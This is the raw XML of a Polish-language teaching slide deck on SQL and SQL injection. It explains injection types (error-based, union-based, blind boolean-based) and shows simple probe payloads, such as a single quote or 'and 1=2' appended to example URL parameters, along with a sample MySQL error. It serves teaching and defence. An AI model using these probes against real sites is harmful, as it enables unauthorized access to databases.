              <a:rPr lang="en" sz="1700"/>
              <a:t> nazwisko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="DD7E6B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> imie </a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F6B26B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> studenci</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F6B26B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> miasto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="DD7E6B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Kielce"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="DD7E6B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="DD7E6B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>Po słowie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> umieszczamy nazwy kolumn, których wartości chcemy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>wyświetlić</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>. W powyższym przykładzie jest to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>nazwisko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> oraz </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>imie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>. Po słowie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> umieszczamy nazwę tabeli lub tabel, w których zamieszczone są poszukiwane informacje. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>Klauzula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> pozwala na określenie warunku wybierania danych. Polecenie kończy się średnikiem.</a:t>
            </a:r>
            <a:endParaRPr sz="1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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168463"/>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SQL Injection to metoda ataku na strony www wykorzystująca lukę w zabezpieczeniach aplikacji. Atakujący „wstrzykuje” własny kod do zapytania w języku SQL, za którego pomocą aplikacja komunikuje się z bazą danych, w ten sposób uzyskując do niej nieautoryzowany dostęp. Dotyczy to wszystkich lub części danych. Może odczytać, edytować lub wykasować dane z bazy, czy nawet wykonać kod na bazie, prowadząc do nieodwracalnych szkód.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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SQL Injection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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="592375"/>
            <a:ext cx="7704000" cy="395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 Ataki SQLi są przeprowadzane na poziomie formularzy wbudowanych w aplikacje webowe, czyli m.in.:</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>w polach logowania,</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>w wewnętrznych wyszukiwarkach produktów,</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>w formularzach kontaktowych,</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>w formularzach rejestracyjnych do newsletterów.</a:t>
            </a:r>
            <a:endParaRPr sz="23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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005350" y="1506750"/>
            <a:ext cx="5305500" cy="213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500"/>
              <a:t>Rodzaje SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="5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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="4536676"/>
            <a:ext cx="7704000" cy="40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https://www.geeksforgeeks.org/what-is-sql-injection-union-attacks/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Google Shape;353;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632100" y="470250"/>
            <a:ext cx="7879793" cy="3994200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="0" dir="0" dist="0" endA="0" endPos="8000" fadeDir="5400012" kx="0" rotWithShape="0" algn="bl" stA="29000" stPos="0" sy="-100000" ky="0"/>
          </a:effectLst>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168463"/>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Najprostszy i najpopularniejszy typ ataku SQLi. W tym przypadku napastnik wykorzystuje tylko jeden kanał do przeprowadzenia ataku i do uzyskania jego wyników. Na przykład: jeśli używa zwykłej przeglądarki internetowej do wstrzyknięcia zapytania SQL, ta sama przeglądarka bezpośrednio zwróci mu wyniki jego działań. Metoda dzieli się na dwa podtypy.</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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In-band SQLi</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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168550"/>
            <a:ext cx="7704000" cy="358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Cechą charakterystyczną tego rodzaju ataku jest to, że napastnik celowo wywołuje błędy bazy danych (stąd nazwa ataku: error-based oznacza oparty na błędach). Błędy mogą dostarczyć mu wielu cennych informacji, takich jak typ i wersja bazy danych albo jej struktura. Informacje te mogą pomóc w ustaleniu dalszej strategii działania. Wiedząc, jak wygląda struktura bazy i aplikacji, atakujący może skorzystać z innych metod SQLi i tak skonstruować kolejne zapytania, by osiągnąć zamierzony cel.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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In-band SQLi - Error based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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1112500"/>
            <a:ext cx="7704000" cy="411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Ten przykład pokazuje adres URL, który akceptuje parametr od użytkownika, w tym przypadku “item”:</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://example.com/index.php?item=123</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="C9DAF8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Atakujący może spróbować dodać pojedynczy cudzysłów na końcu wartości parametru:</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://example.com/index.php?item=123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E6B8AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="72250"/>
            <a:ext cx="7705800" cy="67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Przykład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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="751450"/>
            <a:ext cx="7704000" cy="447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Jeśli baza danych zwróci błąd w stylu:</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solidFill>
                  <a:srgbClr val="E6B8AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Ten komunikat błędu dostarcza atakującemu:</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Informacje o używanej bazie danych — MySQL</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Dokładną składnię, która spowodowała błąd — pojedynczy cudzysłów</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Gdzie wystąpił błąd składniowy w zapytaniu — po wartości parametru</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sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="72250"/>
            <a:ext cx="7705800" cy="67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Przykład</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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168520"/>
            <a:ext cx="7704000" cy="263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Ta metoda polega na wykorzystaniu polecenia UNION w języku SQL, by połączyć wyniki kilku zapytań w jeden. Jest uważana za jedną z najbardziej niebezpiecznych, bo przy braku odpowiednich zabezpieczeń umożliwia wydobycie z bazy danych właściwie wszystkich informacji, które są w niej przechowywane.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Google Shape;383;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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In-band SQLi - Union based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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Spis treści</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011350" y="1473700"/>
            <a:ext cx="7281900" cy="2676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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Bazy danych; relacyjne bazy danych</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>SQL; zapytania SQL</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Rodzaje SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Ochrona przed SQL injection</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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168524"/>
            <a:ext cx="7704000" cy="375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UNION umożliwia użytkownikom baz danych dołączanie dodatkowych zapytań SELECT do oryginalnego zapytania, na przykład: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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT a, b FROM originaltable UNION SELECT e, f FROM othertable</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="C9DAF8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>To zapytanie zwraca jeden zestaw wyników z dwoma kolumnami. Pierwsza kolumna będzie zawierać wartości z kolumny a w originaltable oraz z kolumny e w othertable. Druga kolumna będzie zawierać wartości z kolumny b w originaltable oraz z kolumny f w othertable.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UNION może działać tylko wtedy, gdy każde z zapytań zwraca tę samą liczbę kolumn, a typy danych w każdej odpowiadającej kolumnie są takie same.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719100" y="352175"/>
            <a:ext cx="7705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UNION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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168512"/>
            <a:ext cx="7704000" cy="22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W tym rodzaju ataku napastnik nie widzi bezpośrednio wyników wstrzykiwanych zapytań (stąd słowo blind, czyli ślepy). Może jednak obserwować zachowanie bazy danych i na tej podstawie odtworzyć jej strukturę. Ta metoda wymaga poświęcenia większej ilości czasu, ale nie jest wcale mniej niebezpieczna. Również dzieli się na dwa podtypy.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Inferential SQLi (Blind SQLi)</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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1387000"/>
            <a:ext cx="7704000" cy="312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W tym przypadku napastnik wykorzystuje wstrzykiwanie zapytań SQL po to, by zmusić aplikację do zwracania różnych wyników w zależności od tego, czy zapytanie daje wynik PRAWDA (TRUE) czy FAŁSZ (FALSE). To metoda często wykorzystywana przez hakerów do wstępnego badania, czy dana aplikacja jest podatna na ataki SQLi.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705800" cy="71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Inferential SQLi (Blind SQLi) - Boolean-based (content-based)</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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="751450"/>
            <a:ext cx="7704000" cy="447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Poniższy link wyświetla szczegóły dotyczące przedmiotu o identyfikatorze 14, pobranego z bazy danych.</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.webshop.local/item.php?id=14</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="C9DAF8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Atakujący wstawia:</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solidFill>
                  <a:srgbClr val="C9DAF8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.webshop.local/item.php?id=14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E6B8AF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and 1=2</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E6B8AF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
